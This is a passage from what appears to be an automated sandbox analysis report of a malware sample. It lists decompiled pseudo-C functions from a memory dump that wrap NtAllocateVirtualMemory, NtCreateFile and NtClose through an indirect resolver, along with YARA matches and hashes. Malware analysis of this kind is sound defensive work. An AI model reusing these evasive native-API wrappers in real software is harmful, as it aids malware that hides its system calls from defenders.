                                                                                                                                                    • Instruction Fuzzy Hash: BB0152B5E0010DA7DB10DAA1DC42FDEB378AB54308F0041A5E918A7281F635EB54C795
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0041842A, Relevance: 1.5, APIs: 1, Instructions: 45memorynativeCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 32%
                                                                                                                                                    			E0041842A(void* __ebx, long* __ecx, long __edx, void* __eflags, PVOID* _a4, intOrPtr _a8, void* _a12, PVOID* _a16, intOrPtr _a20) {
				void* _v117;
				intOrPtr* __esi;
				long _t14;
				long _t22;

				asm("sahf");
				if(__eflags < 0) {
					 *(__ebx + 0x4d8b1c45) =  *(__ebx + 0x4d8b1c45) & __ecx;
					asm("sbb [ebx-0x74adeb3c], al");
					asm("adc al, 0x50");
					_t14 = NtAllocateVirtualMemory(_a12, _a16, __edx, __ecx, _t22, _t22); // executed
					return _t14;
				} else {
					 *__ecx =  *__ecx | __ch;
					__eflags = __dl;
					__ebp = __esp;
					__eax = _a4;
					__ecx =  *(__eax + 0x10);
					_t8 = __eax + 0xc68; // 0x10c68
					__esi = _t8;
					__eax = E00418DD0(__eax, __esi,  *(__eax + 0x10), 0, 0x32);
					__edx = _a20;
					__eax = _a16;
					__ecx = _a12;
					__edx = _a8;
					__eax =  *__esi;
					__eax =  *((intOrPtr*)( *__esi))(_a8, _a12, _a16, _a20, __esi, __ebp); // executed
					_pop(__esi);
					_pop(__ebp);
					return  *__esi;
				}
			}







                                                                                                                                                    0x0041842a
                                                                                                                                                    0x0041842b
                                                                                                                                                    0x004183ce
                                                                                                                                                    0x004183d4
                                                                                                                                                    0x004183db
                                                                                                                                                    0x004183e9
                                                                                                                                                    0x004183ed
                                                                                                                                                    0x0041842d
                                                                                                                                                    0x0041842d
                                                                                                                                                    0x0041842f
                                                                                                                                                    0x00418431
                                                                                                                                                    0x00418433
                                                                                                                                                    0x00418436
                                                                                                                                                    0x0041843f
                                                                                                                                                    0x0041843f
                                                                                                                                                    0x00418447
                                                                                                                                                    0x0041844c
                                                                                                                                                    0x0041844f
                                                                                                                                                    0x00418452
                                                                                                                                                    0x00418459
                                                                                                                                                    0x0041845d
                                                                                                                                                    0x00418461
                                                                                                                                                    0x00418463
                                                                                                                                                    0x00418464
                                                                                                                                                    0x00418465
                                                                                                                                                    0x00418465

                                                                                                                                                    APIs
                                                                                                                                                    • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418FA4,?,00000000,?,00003000,00000040,00000000,00000000,00408B03), ref: 004183E9
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246257528.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocateMemoryVirtual
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2167126740-0
                                                                                                                                                    • Opcode ID: 9fc4cd6a9699623b314f68c695e12314c795a0edb1f160f921a187c0ea5b8722
                                                                                                                                                    • Instruction ID: e5e07c23e0b61ecc6f6ba6514068d102416723df266f2d7411522f976c4483dc
                                                                                                                                                    • Opcode Fuzzy Hash: 9fc4cd6a9699623b314f68c695e12314c795a0edb1f160f921a187c0ea5b8722
                                                                                                                                                    • Instruction Fuzzy Hash: E10181B12042486FCB14CFA9DCC5DE77BACEF99650F14868DF9598B242C531E914CBB0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004181D0, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E004181D0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;

				_t3 = _a4 + 0xc40; // 0xc40
				E00418DD0(_a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}




                                                                                                                                                    0x004181df
                                                                                                                                                    0x004181e7
                                                                                                                                                    0x0041821d
                                                                                                                                                    0x00418221

                                                                                                                                                    APIs
                                                                                                                                                    • NtCreateFile.NTDLL(00000060,00408B03,?,00413BA7,00408B03,FFFFFFFF,?,?,FFFFFFFF,00408B03,00413BA7,?,00408B03,00000060,00000000,00000000), ref: 0041821D
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246257528.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateFile
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 823142352-0
                                                                                                                                                    • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                                                                                    • Instruction ID: 4ba06d0811943408d915368c3acdb1aee86cb039c5ce671b45e9a6de03e682c0
                                                                                                                                                    • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                                                                                    • Instruction Fuzzy Hash: EAF0B2B2200208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004181CB, Relevance: 1.5, APIs: 1, Instructions: 39filenativeCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 79%
                                                                                                                                                    			E004181CB(void* __edx, intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;

				asm("sbb [0x8bec8b55], ch");
				_t15 = _a4;
				_t3 = _t15 + 0xc40; // 0xc40
				E00418DD0(_a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}




                                                                                                                                                    0x004181ce
                                                                                                                                                    0x004181d3
                                                                                                                                                    0x004181df
                                                                                                                                                    0x004181e7
                                                                                                                                                    0x0041821d
                                                                                                                                                    0x00418221

                                                                                                                                                    APIs
                                                                                                                                                    • NtCreateFile.NTDLL(00000060,00408B03,?,00413BA7,00408B03,FFFFFFFF,?,?,FFFFFFFF,00408B03,00413BA7,?,00408B03,00000060,00000000,00000000), ref: 0041821D
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246257528.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateFile
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 823142352-0
                                                                                                                                                    • Opcode ID: 20e92779011ac0e04daff7c233cce501c312b90211f4dc961b9a7cec4a8ac32c
                                                                                                                                                    • Instruction ID: 706bd3f36b3da54dd90dc2834f4bdaca83244fcf7e43a2b86b73b47cc0820688
                                                                                                                                                    • Opcode Fuzzy Hash: 20e92779011ac0e04daff7c233cce501c312b90211f4dc961b9a7cec4a8ac32c
                                                                                                                                                    • Instruction Fuzzy Hash: 3AF0ECB6214148ABCB08CF99D884CEB77A9FF8C354B15964DF95D93201D634E855CBA0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004183AA, Relevance: 1.5, APIs: 1, Instructions: 31memorynativeCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 79%
                                                                                                                                                    			E004183AA(void* __ebx, signed int __edi, intOrPtr _a4, void* _a8, PVOID* _a12, long _a28) {
				intOrPtr _v117;
				intOrPtr _t14;
				long _t17;
				long* _t19;
				long _t22;
				long _t29;
				long _t31;

				_v117 = _v117 +  *(_t31 + __edi * 4 - 0x78) * 0xffffffca;
				_t29 = _t31;
				_t14 = _a4;
				_t19 =  *(_t14 + 0x10);
				_t8 = _t14 + 0xc60; // 0xca0
				E00418DD0(_t14, _t8, _t19, 0, 0x30);
				_t22 = _a28;
				 *(__ebx + 0x4d8b1c45) =  *(__ebx + 0x4d8b1c45) & _t19;
				asm("sbb [ebx-0x74adeb3c], al");
				asm("adc al, 0x50");
				_t17 = NtAllocateVirtualMemory(_a8, _a12, _t22, _t19, _t29, _t29); // executed
				return _t17;
			}










                                                                                                                                                    0x004183af
                                                                                                                                                    0x004183b1
                                                                                                                                                    0x004183b3
                                                                                                                                                    0x004183b6
                                                                                                                                                    0x004183bf
                                                                                                                                                    0x004183c7
                                                                                                                                                    0x004183cc
                                                                                                                                                    0x004183ce
                                                                                                                                                    0x004183d4
                                                                                                                                                    0x004183db
                                                                                                                                                    0x004183e9
                                                                                                                                                    0x004183ed

                                                                                                                                                    APIs
                                                                                                                                                    • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418FA4,?,00000000,?,00003000,00000040,00000000,00000000,00408B03), ref: 004183E9
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246257528.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocateMemoryVirtual
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2167126740-0
                                                                                                                                                    • Opcode ID: 11195c9e95143480f7653253d9b29615d8e43e3f047449858d110e97f9bcb2bc
                                                                                                                                                    • Instruction ID: 1c7ba49dd148709324ea57caa2532edf34092887b1d5dc0183576e7391f031c4
                                                                                                                                                    • Opcode Fuzzy Hash: 11195c9e95143480f7653253d9b29615d8e43e3f047449858d110e97f9bcb2bc
                                                                                                                                                    • Instruction Fuzzy Hash: 5AF05EB2204208AFCB14DF99DC81EEB77A9AF98340F15864DF90997291C630E810CBA0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004183B0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 75%
                                                                                                                                                    			E004183B0(void* __ebx, intOrPtr _a4, void* _a8, PVOID* _a12, long _a28) {
				intOrPtr _t9;
				long _t12;
				long* _t14;
				long _t16;
				long _t19;

				_t9 = _a4;
				_t14 =  *(_t9 + 0x10);
				_t3 = _t9 + 0xc60; // 0xca0
				E00418DD0(_t9, _t3, _t14, 0, 0x30);
				_t16 = _a28;
				 *(__ebx + 0x4d8b1c45) =  *(__ebx + 0x4d8b1c45) & _t14;
				asm("sbb [ebx-0x74adeb3c], al");
				asm("adc al, 0x50");
				_t12 = NtAllocateVirtualMemory(_a8, _a12, _t16, _t14, _t19, _t19); // executed
				return _t12;
			}








                                                                                                                                                    0x004183b3
                                                                                                                                                    0x004183b6
                                                                                                                                                    0x004183bf
                                                                                                                                                    0x004183c7
                                                                                                                                                    0x004183cc
                                                                                                                                                    0x004183ce
                                                                                                                                                    0x004183d4
                                                                                                                                                    0x004183db
                                                                                                                                                    0x004183e9
                                                                                                                                                    0x004183ed

                                                                                                                                                    APIs
                                                                                                                                                    • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418FA4,?,00000000,?,00003000,00000040,00000000,00000000,00408B03), ref: 004183E9
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246257528.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocateMemoryVirtual
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2167126740-0
                                                                                                                                                    • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                                                                                    • Instruction ID: 5f1ba135279249ad747bfdca3347611d303f78695a7cb9da664d5d0d2719559c
                                                                                                                                                    • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                                                                                    • Instruction Fuzzy Hash: 4EF015B2200208ABCB14DF89DC81EEB77ADAF88754F118249BE0897281C630F810CBA4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00418300, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E00418300(intOrPtr _a4, void* _a8) {
				long _t8;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x409753
				E00418DD0(_a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}




                                                                                                                                                    0x00418303
                                                                                                                                                    0x00418306
                                                                                                                                                    0x0041830f
                                                                                                                                                    0x00418317
                                                                                                                                                    0x00418325
                                                                                                                                                    0x00418329

                                                                                                                                                    APIs
                                                                                                                                                    • NtClose.NTDLL(00413D40,?,?,00413D40,00408B03,FFFFFFFF), ref: 00418325
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246257528.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Close
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3535843008-0
                                                                                                                                                    • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                                                                                    • Instruction ID: e0948211a995ee673693cff6b37ba25287d5fac55aefcf59dfc2265e20a22c74
                                                                                                                                                    • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                                                                                    • Instruction Fuzzy Hash: EAD012752003146BD710EF99DC45ED7775CEF44750F154559BA185B282C570F90086E0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 009200C4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246637446.0000000000910000.00000040.00000001.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                    • Associated: 00000007.00000002.2246630642.0000000000900000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246724865.00000000009F0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246731757.0000000000A00000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246739338.0000000000A04000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246746087.0000000000A07000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246752065.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246784838.0000000000A70000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                                                                                                                    • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                                                                                                                                    • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                                                                                                                    • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00920048, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246637446.0000000000910000.00000040.00000001.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                    • Associated: 00000007.00000002.2246630642.0000000000900000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246724865.00000000009F0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246731757.0000000000A00000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246739338.0000000000A04000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246746087.0000000000A07000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246752065.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246784838.0000000000A70000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    • Opcode ID: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                                                                                                                                    • Instruction ID: 41e4343c146f66e2bb318e135f4e172b2897deff735033a37a94e91f6413aa4b
                                                                                                                                                    • Opcode Fuzzy Hash: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                                                                                                                                    • Instruction Fuzzy Hash: DBB012B2100540C7E3099714D946B4B7210FB90F00F40C93BA11B81861DB3C993CD46A
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00920078, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246637446.0000000000910000.00000040.00000001.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                    • Associated: 00000007.00000002.2246630642.0000000000900000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246724865.00000000009F0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246731757.0000000000A00000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246739338.0000000000A04000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246746087.0000000000A07000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246752065.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246784838.0000000000A70000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    • Opcode ID: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                                                                                                                                    • Instruction ID: 3a645d05db048e5a2937cf36c3d58d647fc753ae06e93f94360992995f7f05c0
                                                                                                                                                    • Opcode Fuzzy Hash: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                                                                                                                                    • Instruction Fuzzy Hash: 2AB012B1504640C7F304F704D905B16B212FBD0F00F408938A14F86591D73DAD2CC78B
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0091F9F0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246637446.0000000000910000.00000040.00000001.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                    • Associated: 00000007.00000002.2246630642.0000000000900000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246724865.00000000009F0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246731757.0000000000A00000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246739338.0000000000A04000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246746087.0000000000A07000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246752065.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246784838.0000000000A70000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                                                                                                                    • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                                                                                                                                    • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                                                                                                                    • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0091F900, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246637446.0000000000910000.00000040.00000001.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                    • Associated: 00000007.00000002.2246630642.0000000000900000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246724865.00000000009F0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246731757.0000000000A00000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246739338.0000000000A04000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246746087.0000000000A07000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246752065.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246784838.0000000000A70000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                                                                                                                    • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                                                                                                                                                    • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                                                                                                                    • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0091FAD0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246637446.0000000000910000.00000040.00000001.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                    • Associated: 00000007.00000002.2246630642.0000000000900000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246724865.00000000009F0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246731757.0000000000A00000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246739338.0000000000A04000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246746087.0000000000A07000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246752065.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246784838.0000000000A70000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    • Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                                                                                                                    • Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
                                                                                                                                                    • Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                                                                                                                    • Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0091FAE8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246637446.0000000000910000.00000040.00000001.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                    • Associated: 00000007.00000002.2246630642.0000000000900000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246724865.00000000009F0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246731757.0000000000A00000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246739338.0000000000A04000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246746087.0000000000A07000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246752065.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246784838.0000000000A70000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                                                                                                                    • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                                                                                                                                    • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                                                                                                                    • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0091FBB8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246637446.0000000000910000.00000040.00000001.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                    • Associated: 00000007.00000002.2246630642.0000000000900000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246724865.00000000009F0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246731757.0000000000A00000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246739338.0000000000A04000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246746087.0000000000A07000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246752065.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246784838.0000000000A70000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                                                                                                                    • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
                                                                                                                                                    • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                                                                                                                    • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0091FB68, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246637446.0000000000910000.00000040.00000001.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                    • Associated: 00000007.00000002.2246630642.0000000000900000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246724865.00000000009F0000.00000040.00000001.sdmp Download File
